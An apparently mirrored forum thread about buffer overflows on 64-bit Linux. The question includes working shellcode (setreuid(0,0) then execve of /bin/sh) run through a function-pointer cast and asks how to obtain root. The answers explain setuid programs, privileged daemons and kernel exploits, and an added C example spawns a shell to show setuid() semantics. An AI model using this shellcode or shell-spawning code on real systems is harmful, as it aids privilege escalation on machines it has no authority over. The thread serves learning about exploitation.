Buffer overflows on 64 Bit Linux

I have been playing around with buffer overflows for fun. I have been able to run some simple exploits. I have been doing this by using C code that casts a character string containing the shell code to a function pointer. Doing this is quite interesting for me; for instance, I had never assumed that a function pointer could allow the user to execute code which is not even hard-coded in the source. For a simple example see below:

#include <unistd.h>

/* 32-bit Linux shellcode using the int 0x80 ABI: setreuid(0, 0), then
 * execve("/bin/sh", ["/bin/sh", NULL], NULL). The jmp/call/pop sequence
 * locates the trailing "/bin/sh" string and patches the NUL terminator,
 * the argv pointer ("AAAA") and the NULL ("BBBB") in place, so code[]
 * must be both writable and executable. Assumption: built as a non-PIE
 * binary with an executable data segment (e.g. -z execstack) on an
 * x86-64 kernel with 32-bit (IA-32) syscall emulation enabled. */
char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char **argv)
{
        (void)argc;
        (void)argv;

        /* Cast the byte string to a function pointer and call it:
         * the bytes of code[] are executed as machine code. */
        void (*func)(void);

        func = (void (*)(void)) code;
        func();

        return 0;
}

This small piece of code will spawn a shell on 64-bit Linux. The question is: is it possible to get root permissions using a shell script? This would be quite fun to try. I have found some shell scripts on the internet that claim to be able to do this; however, they produce only seg faults when I try running them. I would be grateful if someone can give me any hints as to whether this is at all possible. I would also appreciate any interesting shell scripts to play with.

Cheers.

With just a regular buffer overflow the shell code can't do anything the original program can't; you would need an actual kernel exploit for that.

You usually get root shells when you have programs that run as root, either because they have the +s flag (setuid) or because they are daemons that take user input from somewhere outside the system.

Setuid programs are programs that run as a different user than the one who launched them. Take su for example: it is owned by root and has +s set, therefore it runs as root no matter who starts it. The program then tries to confirm that you are allowed to escalate privileges and spawns a shell for the user you requested. If there were a buffer overflow vulnerability in su and you were to put a regular /bin/sh payload in it, you would end up with a root shell.

A daemon could be, for example, a web interface that runs as root in order to do something (maybe it can shut down the PC). If it had a vulnerability that you could reach from outside the computer, like a buffer overflow in the HTTP headers, you would again be able to spawn a root shell.

The shells you saw probably made use of the setuid() C function (or similar ones), which can do the same thing as +s if the process is privileged enough.
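To make the last two points concrete, here is an added example in C; it is not part of the question or of the answer above. It shows what the setuid()-based "root shell" snippets actually do and why they only work from a process that is already privileged: per setuid(2), an unprivileged process may only set its user ID to its real or saved set-user-ID, so setuid(0) from an ordinary user process fails with EPERM, while the same call succeeds inside a setuid-root binary (real uid = you, effective uid = 0). The helper names, and the simplification that "privileged" means an effective uid of 0 (ignoring file capabilities such as CAP_SETUID and the saved uid), are assumptions of this example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* The two uids that decide the outcome of setuid() for this example
 * (the saved set-user-ID also matters per setuid(2), but is ignored here). */
struct creds {
    uid_t ruid;   /* real uid: who launched the process */
    uid_t euid;   /* effective uid: what +s on a root-owned file changes */
};

/* Snapshot of the calling process's credentials. */
struct creds current_creds(void)
{
    struct creds c;
    c.ruid = getuid();
    c.euid = geteuid();
    return c;
}

/* Simplified rule from setuid(2): setuid(0) succeeds when the process is
 * privileged (effective uid 0 stands in for CAP_SETUID here) or when 0 is
 * already its real uid. Returns 1 if the call is expected to succeed. */
int setuid_root_expected(struct creds c)
{
    return c.euid == 0 || c.ruid == 0;
}

/* The first thing the "root shell" scripts do: try to become uid 0.
 * Returns 0 on success, otherwise the errno value (EPERM when unprivileged). */
int try_become_root(void)
{
    if (setuid(0) == 0)
        return 0;
    return errno;
}

/* Performs the attempt and checks it against the rule above.
 * Returns 1 if what the kernel did matched the rule, 0 otherwise. */
int outcome_matches_rule(void)
{
    struct creds before = current_creds();
    int rc = try_become_root();
    if (setuid_root_expected(before))
        return rc == 0;
    return rc == EPERM;
}

/* The second half of such a payload: exec a shell with whatever uid the
 * process now has. Only reached when explicitly requested on the command line. */
int spawn_shell(void)
{
    char *const argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return errno;   /* only reached if execve failed */
}

int main(int argc, char **argv)
{
    struct creds c = current_creds();
    printf("before: ruid=%u euid=%u\n", (unsigned)c.ruid, (unsigned)c.euid);

    int rc = try_become_root();
    printf("setuid(0): %s\n", rc == 0 ? "ok" : strerror(rc));

    c = current_creds();
    printf("after:  ruid=%u euid=%u\n", (unsigned)c.ruid, (unsigned)c.euid);

    /* Run as "./creds --shell", once as a normal binary and once after
     * "chown root creds && chmod u+s creds", to see which uid the resulting
     * shell actually gets (check with "id" inside it). */
    if (argc > 1 && strcmp(argv[1], "--shell") == 0) {
        rc = spawn_shell();
        fprintf(stderr, "execve: %s\n", strerror(rc));
        return 1;
    }
    return 0;
}
```

Run as an ordinary user, setuid(0) fails with "Operation not permitted" and the shell you get from --shell is your own; the same binary owned by root with u+s reports euid=0 before the call and hands you a root shell afterwards. That is exactly the difference the answer describes: the payload never grants privileges, it can only use those the process already has.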

Notice: the technical posts on this site are published under the CC BY-SA 4.0 licence; if you repost them, please credit this site's URL or the original address. For any questions contact: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM